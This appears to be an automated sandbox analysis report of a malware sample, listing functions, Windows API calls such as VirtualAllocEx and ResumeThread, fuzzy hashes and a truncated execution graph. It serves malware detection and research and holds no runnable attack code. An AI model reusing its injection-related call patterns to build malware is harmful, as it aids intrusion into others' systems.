                                                                                                                                            • Opcode Fuzzy Hash: 6fdfa000a14131f913662812e398f09c1e464308f141e7ae9bc85eb64c6547d7
                                                                                                                                            • Instruction Fuzzy Hash: 651189B58002499FCB10DFAAC845BDEFFF5EF48320F20841AE455A7250C775A950CFA0
                                                                                                                                            Function 07D05A88 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07D05AF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 214186d9305b9f1f7fad8eee6725d2b75297f8787d269ac96ac3618dfc7ad58f
                                                                                                                                            • Instruction ID: 1254c23a0c8e051e35dfd570b84e0e81076cc96f4a6a60fe00ba3980076934b0
                                                                                                                                            • Opcode Fuzzy Hash: 214186d9305b9f1f7fad8eee6725d2b75297f8787d269ac96ac3618dfc7ad58f
                                                                                                                                            • Instruction Fuzzy Hash: 751137B19002499FCB10DFAAC845BDEFFF5EF88320F108419E559A7250C775A954CFA4
                                                                                                                                            Function 07D054C3 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ResumeThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                            • Opcode ID: 5643e7d9e3308482680c8814f87f9a173442ff13766017712529db75bf865ce2
                                                                                                                                            • Instruction ID: dca3ca65bebf07745a0bc26877a9e08ec5975ba55d724ac2357554b6a650af4c
                                                                                                                                            • Opcode Fuzzy Hash: 5643e7d9e3308482680c8814f87f9a173442ff13766017712529db75bf865ce2
                                                                                                                                            • Instruction Fuzzy Hash: 07116DB19002498FCB10DFAAD4457DEFBF5EB88324F20841AD459A7250C734A544CF94
                                                                                                                                            Function 07D054C8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ResumeThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                            • Opcode ID: 17b93feb798c504a8824b330e331dc1db2f5268d16743030726dfed6e91a9cbf
                                                                                                                                            • Instruction ID: 45e77630d7531e83045d34747a614dbee591c1aa40176119e73bb0ba5f31bfe2
                                                                                                                                            • Opcode Fuzzy Hash: 17b93feb798c504a8824b330e331dc1db2f5268d16743030726dfed6e91a9cbf
                                                                                                                                            • Instruction Fuzzy Hash: 4D113AB19002498FCB10DFAAD449BDEFBF5EB88324F208419D559A7250C775A944CF94
                                                                                                                                            Function 07D08210 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 46d71bea8015638b4275fbadf0a8be9421e6f47d66234bebf7261a8ff3051dcd
                                                                                                                                            • Instruction ID: 3dcbcff3e43884fa65a378914c316298cada1251197da8a4822db71a86fddc75
                                                                                                                                            • Opcode Fuzzy Hash: 46d71bea8015638b4275fbadf0a8be9421e6f47d66234bebf7261a8ff3051dcd
                                                                                                                                            • Instruction Fuzzy Hash: 9011E3B5800249DFDB10DF9AD545BDEBBF8EB48320F10841AE558A7650C375A584CFA1
                                                                                                                                            Function 0161D5C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0161D626
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724836918.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_1610000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 15e75d8a4a76ba6fa718f9e9153da81452633e55efb62df71aa9e4c75b0604c8
                                                                                                                                            • Instruction ID: 8dee69b0b59b875c8d360ae5ffcb15a8f5b3872b1c80063514546ff6338ab601
                                                                                                                                            • Opcode Fuzzy Hash: 15e75d8a4a76ba6fa718f9e9153da81452633e55efb62df71aa9e4c75b0604c8
                                                                                                                                            • Instruction Fuzzy Hash: 331110B5C002598FDB10DF9AC848ADEFBF4AB88324F14842AD458B7210C379A545CFA5
                                                                                                                                            Function 07D0483C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 89c76b74bc241e21669db68c852299f6e79594203306e2060fdc91fc13a6237c
                                                                                                                                            • Instruction ID: cf5f23e1fc8a2c629703f5e77b9c0a20f14a68de04016c157bd05b9f27d5c4e0
                                                                                                                                            • Opcode Fuzzy Hash: 89c76b74bc241e21669db68c852299f6e79594203306e2060fdc91fc13a6237c
                                                                                                                                            • Instruction Fuzzy Hash: 1911F2B5800749DFCB10DFAAC489BDEFBF8EB48320F10841AE558A7250C375A984CFA1
                                                                                                                                            Function 07D082AB Relevance: 1.5, APIs: 1, Instructions: 23windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07D08275
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePost
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                            • Opcode ID: 88434bde3ed3d9cd73b1cdd8c26bf38dafae61138c99b0075b37ab541d1b99d2
                                                                                                                                            • Instruction ID: e01b15825944cb97693c001397b34dc27473592e903595252cb167bd7e847872
                                                                                                                                            • Opcode Fuzzy Hash: 88434bde3ed3d9cd73b1cdd8c26bf38dafae61138c99b0075b37ab541d1b99d2
                                                                                                                                            • Instruction Fuzzy Hash: 14E04FB6805204CEDB219B69E0043CDFBE0DB90324F24846AC599975A0C6795484CEE1
                                                                                                                                            Function 015BD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
                                                                                                                                            • Instruction ID: fccc045c06d46586bb00aecd19793ee08fda9a9b7bbf261883910b579dd3aaed
                                                                                                                                            • Opcode Fuzzy Hash: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
                                                                                                                                            • Instruction Fuzzy Hash: 6F212871500204DFDB05DF58D9C0BAABFB5FB94318F20C569D9094F256C37AE456C6A1
                                                                                                                                            Function 015BD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 999edc37edcdb7d58870bbe9ca55a5586e246cb09352e7da9c75377af1a8884f
                                                                                                                                            • Instruction ID: 5fdb6fcbb609858f14717c95c8d1b1e78bb2e02075e173ea4a9aeb1ada3239f1
                                                                                                                                            • Opcode Fuzzy Hash: 999edc37edcdb7d58870bbe9ca55a5586e246cb09352e7da9c75377af1a8884f
                                                                                                                                            • Instruction Fuzzy Hash: 4C212271500240DFDB05DF58D9C0B6ABFB5FB8831CF20C569E9090F296C33AD456CAA2
                                                                                                                                            Function 015CD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
                                                                                                                                            • Instruction ID: 52e3dd6196ddc941f696c3092f58356cd665ff95d7db74ac60485121c78b1e67
                                                                                                                                            • Opcode Fuzzy Hash: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
                                                                                                                                            • Instruction Fuzzy Hash: A8210075604200DFCB15DF98D984B2ABBB5FB84B14F20C97DD80A9F256D33AD447CAA1
                                                                                                                                            Function 015CD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
                                                                                                                                            • Instruction ID: 667459e4a9fb61c175fd19ba9bbd6c9b094eff0f36b29f274077d75a21852859
                                                                                                                                            • Opcode Fuzzy Hash: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
                                                                                                                                            • Instruction Fuzzy Hash: 9D21F571504200DFDB05DF98D9C4B2ABBB6FB84724F20C97DD9498F256C33AD446CAA1
                                                                                                                                            Function 015CD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
                                                                                                                                            • Instruction ID: e80a9362568cafb070cc37fdb4846c489a0df1a53c1c8199450973a00b1652ec
                                                                                                                                            • Opcode Fuzzy Hash: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
                                                                                                                                            • Instruction Fuzzy Hash: 06217F755093808FDB12CF68D594715BF71FB46214F28C5EAD8498F6A7C33A980ACBA2
                                                                                                                                            Function 015BD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction ID: 6840a449b03ab5dec003b8a5cf2d7489c95de20fd76eecd853b5f9721f2efea2
                                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction Fuzzy Hash: 4111DF72404240CFDB02CF44D5C4B9ABF71FB94328F24C6A9D9090F256C37AE45ACBA2
                                                                                                                                            Function 015BD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724533168.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15bd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction ID: 8ba333a9180542a34ef5e1beb4c72484da9e8e420cccc368dbb281e79dd3133b
                                                                                                                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                            • Instruction Fuzzy Hash: 8B11E172404280CFCB02CF54D5C4B5ABF71FB84318F24C6A9D8090F256C33AD45ACBA1
                                                                                                                                            Function 015CD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1724600540.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_15cd000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction ID: bac7f087fa5525c4eedaf07bd7b4cc4bbc79f7c6ca3fcd44a32a84954f943b61
                                                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction Fuzzy Hash: BD11BE75504240DFDB02CF94C5C4B19BF72FB84624F24C6AED8498F256C33AD40ACB91

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 07D05650 Relevance: .3, Instructions: 312COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2b6a502c4f03314993a6106139162cbf8012de501cdecf43b3339e9edeffa363
                                                                                                                                            • Instruction ID: da8c90a0d11c5e17e038a75cdc3b841c8d96de8aad43bef67d6c5e62ffdea5bc
                                                                                                                                            • Opcode Fuzzy Hash: 2b6a502c4f03314993a6106139162cbf8012de501cdecf43b3339e9edeffa363
                                                                                                                                            • Instruction Fuzzy Hash: 13E1F8B4E001198FDB14DFA9D584AAEFBB2FF89304F24D169D815AB356D730A941CFA0
                                                                                                                                            Function 07D034A0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f9f6a122266f3037e9c86d2dbfa71b2c290be3e61db62653a32ef97a3a4c9297
                                                                                                                                            • Instruction ID: 988254b5632eda901c0780fb1ef2a225b5f3343abaea33630ffce62cb89ab230
                                                                                                                                            • Opcode Fuzzy Hash: f9f6a122266f3037e9c86d2dbfa71b2c290be3e61db62653a32ef97a3a4c9297
                                                                                                                                            • Instruction Fuzzy Hash: 2DE1E7B4E001198FDB14DFA9C584AAEFBB2FF89304F24D169E415AB356D731A941CFA0
                                                                                                                                            Function 07D02C30 Relevance: .3, Instructions: 312COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c297fd9acdd3f0101cd4f9139059dc2154fcc1bf75fde13a0c9740a041abd654
                                                                                                                                            • Instruction ID: 56f85b2dd2c5e8dc4e24c80028c70911885a937ae2bd201025c96efbbe9d5d3b
                                                                                                                                            • Opcode Fuzzy Hash: c297fd9acdd3f0101cd4f9139059dc2154fcc1bf75fde13a0c9740a041abd654
                                                                                                                                            • Instruction Fuzzy Hash: FDE1E6B4E011198FDB14DFA9C584AAEFBB2FB89304F24D169D415AB356D730AD42CFA0
                                                                                                                                            Function 07D038D8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1414a56e908ea2d8f4dbe535a0c056fe5fefee13f22410c2615771e228d9ae97
                                                                                                                                            • Instruction ID: 17e7d085ef5cfabe105b5dcfcddc870a06ce0088096b7593ef524ac1402baa63
                                                                                                                                            • Opcode Fuzzy Hash: 1414a56e908ea2d8f4dbe535a0c056fe5fefee13f22410c2615771e228d9ae97
                                                                                                                                            • Instruction Fuzzy Hash: 64E1D7B4E001198FDB14DFA9C580AAEFBB2FF89304F24D169E415AB356D731A941CFA1
                                                                                                                                            Function 07D03068 Relevance: .3, Instructions: 312COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e83cd285874dd640c5aca0b947641c3d8f506f7429a51d78d0a029fea5a78578
                                                                                                                                            • Instruction ID: da81016e2941e1a3c4fed782b88ef65d11cbe5822d032b54bbc56df40901a43f
                                                                                                                                            • Opcode Fuzzy Hash: e83cd285874dd640c5aca0b947641c3d8f506f7429a51d78d0a029fea5a78578
                                                                                                                                            • Instruction Fuzzy Hash: FAE1E8B4E001198FDB14DFA9C584AAEFBB2FF89304F24D169D415AB356DB30A941CFA1
                                                                                                                                            Function 07D0305B Relevance: .1, Instructions: 133COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 903de95c1c3cd192a21af4abce7b64b337058ac02a19a37cda2f2a646fba84cd
                                                                                                                                            • Instruction ID: 9916477a7cc7f438a29cc258c5ba7d578a8f978dbe10c6eff1274643e4341a85
                                                                                                                                            • Opcode Fuzzy Hash: 903de95c1c3cd192a21af4abce7b64b337058ac02a19a37cda2f2a646fba84cd
                                                                                                                                            • Instruction Fuzzy Hash: 84511AB4E012198FDB14CFAAC5845AEFBF2FF89304F24D16AD418AB256D7319941CFA1
                                                                                                                                            Function 07D071F4 Relevance: .0, Instructions: 39COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a8aacfc7fcd70f96db6c7fb4af6c2d3e91c574f0cf4b7f38146c74ba35962e8
                                                                                                                                            • Instruction ID: 8d335df8656274043c075836e372f6c2a48b9ab9cb6bf9e318319a43b6919cf5
                                                                                                                                            • Opcode Fuzzy Hash: 7a8aacfc7fcd70f96db6c7fb4af6c2d3e91c574f0cf4b7f38146c74ba35962e8
                                                                                                                                            • Instruction Fuzzy Hash: F5F01D74929254CBCF10CF58D4553E8FFB8BB5A362F003096D40EA6391DB709A85CE91
                                                                                                                                            Function 07D0716B Relevance: .0, Instructions: 32COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1731156561.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7d00000_n0srYVYMDI.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f717476b19aefa826a1c9fb7b29060ef0676f23f9d21e7a7dc7eb6fa6b5b1727
                                                                                                                                            • Instruction ID: 32a1a69b86bdee9b527110d98dbc4b6da722785b14cb9ed8cde70d206b3f9a02
                                                                                                                                            • Opcode Fuzzy Hash: f717476b19aefa826a1c9fb7b29060ef0676f23f9d21e7a7dc7eb6fa6b5b1727
                                                                                                                                            • Instruction Fuzzy Hash: F2F0127495A1448FCF108B98D4551F4FF78AB5B321F007096D44E9B652DA30A5558FA0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.4%
                                                                                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                            Signature Coverage:5.7%
                                                                                                                                            Total number of Nodes:557
                                                                                                                                            Total number of Limit Nodes:73
                                                                                                                                            execution_graph 96587 41f080 96590 41b930 96587->96590 96591 41b956 96590->96591 96598 409d30 96591->96598 96593 41b962 96594 41b983 96593->96594 96606 40c1b0 96593->96606 96596 41b975 96642 41a670 96596->96642 96599 409d3d 96598->96599 96645 409c80 96598->96645 96601 409d44 96599->96601 96657 409c20 96599->96657 96601->96593 96607 40c1d5 96606->96607 97076 40b1b0 96607->97076 96609 40c22c 97080 40ae30 96609->97080 96611 40c4a3 96611->96596 96612 40c252 96612->96611 97089 414390 96612->97089 96614 40c297 96614->96611 97092 408a60 96614->97092 96616 40c2db 96616->96611 97099 41a4c0 96616->97099 96620 40c331 96621 40c338 96620->96621 97111 419fd0 96620->97111 96622 41bd80 2 API calls 96621->96622 96624 40c345 96622->96624 96624->96596 96626 40c382 96627 41bd80 2 API calls 96626->96627 96628 40c389 96627->96628 96628->96596 96629 40c392 96630 40f490 3 API calls 96629->96630 96631 40c406 96630->96631 96631->96621 96632 40c411 96631->96632 96633 41bd80 2 API calls 96632->96633 96634 40c435 96633->96634 97116 41a020 96634->97116 96637 419fd0 2 API calls 96638 40c470 96637->96638 96638->96611 97121 419de0 96638->97121 96641 41a670 2 API calls 96641->96611 96643 41a68f ExitProcess 96642->96643 96644 41af20 LdrLoadDll 96642->96644 96644->96643 96676 418b80 96645->96676 96649 409ca6 96649->96599 96650 409c9c 96650->96649 96683 41b270 96650->96683 96652 409ce3 96652->96649 96694 409aa0 96652->96694 96654 409d03 96700 409620 LdrLoadDll 96654->96700 96656 409d15 96656->96599 96658 409c3a 96657->96658 96659 41b560 LdrLoadDll 96657->96659 97051 41b560 96658->97051 96659->96658 96662 41b560 LdrLoadDll 96663 409c61 96662->96663 96664 40f170 96663->96664 96665 40f189 96664->96665 97059 40b030 96665->97059 96667 40f19c 97063 41a1a0 96667->97063 96670 409d55 96670->96593 96672 40f1c2 96673 40f1ed 96672->96673 97069 41a220 96672->97069 96675 41a450 2 API calls 96673->96675 96675->96670 96677 418b8f 96676->96677 96701 414e40 96677->96701 96679 409c93 96680 418a30 96679->96680 96707 41a5c0 96680->96707 96684 41b289 96683->96684 96714 414a40 96684->96714 96686 41b2a1 96687 41b2aa 96686->96687 96753 41b0b0 96686->96753 96687->96652 96689 41b2be 96689->96687 96771 419ec0 96689->96771 97029 407ea0 96694->97029 96696 409ac1 96696->96654 96697 409aba 96697->96696 97042 408160 96697->97042 96700->96656 96702 414e5a 96701->96702 96703 414e4e 96701->96703 96702->96679 96703->96702 96706 4152c0 LdrLoadDll 96703->96706 96705 414fac 96705->96679 96706->96705 96710 41af20 96707->96710 96709 418a45 96709->96650 96711 41af30 96710->96711 96713 41af52 96710->96713 96712 414e40 LdrLoadDll 96711->96712 96712->96713 96713->96709 96715 414d75 96714->96715 96725 414a54 96714->96725 96715->96686 96718 414b80 96782 41a320 96718->96782 96719 414b63 96839 41a420 LdrLoadDll 96719->96839 96722 414b6d 96722->96686 96723 414ba7 96724 41bd80 2 API calls 96723->96724 96727 414bb3 96724->96727 96725->96715 96779 419c10 96725->96779 96726 414d39 96729 41a450 2 API calls 96726->96729 96727->96722 96727->96726 96728 414d4f 96727->96728 96734 414c42 96727->96734 96848 414780 LdrLoadDll NtReadFile NtClose 96728->96848 96730 414d40 96729->96730 96730->96686 96732 414d62 96732->96686 96733 414ca9 96733->96726 96735 414cbc 96733->96735 96734->96733 96736 414c51 96734->96736 96841 41a2a0 96735->96841 96738 414c56 96736->96738 96739 414c6a 96736->96739 96840 414640 LdrLoadDll 